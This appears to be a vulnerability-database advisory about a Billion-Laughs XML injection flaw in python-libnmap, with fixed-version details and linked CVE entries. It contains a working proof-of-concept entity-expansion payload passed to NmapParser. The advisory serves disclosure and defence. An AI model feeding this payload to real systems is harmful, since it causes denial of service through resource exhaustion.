Описание
XML Injection in python-libnmap
Description
python-libnmap is affected by a Billion-Laughs -style XML injection vulnerability.
PoC
ty = NmapParser()
payload = """
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz><hello>&lol3;</hello></lolz>
"""
ty.parse(payload)
Пакеты
Наименование
python-libnmap
pip
Затронутые версииВерсия исправления
< 0.7.2
0.7.2
Связанные уязвимости
CVSS3: 7.5
ubuntu
больше 6 лет назад
libnmap < v0.6.3 is affected by: XML Injection. The impact is: Denial of service (DoS) by consuming resources. The component is: XML Parsing. The attack vector is: Specially crafted XML payload.
CVSS3: 7.5
nvd
больше 6 лет назад
libnmap < v0.6.3 is affected by: XML Injection. The impact is: Denial of service (DoS) by consuming resources. The component is: XML Parsing. The attack vector is: Specially crafted XML payload.
CVSS3: 7.5
debian
больше 6 лет назад
libnmap < v0.6.3 is affected by: XML Injection. The impact is: Denial ...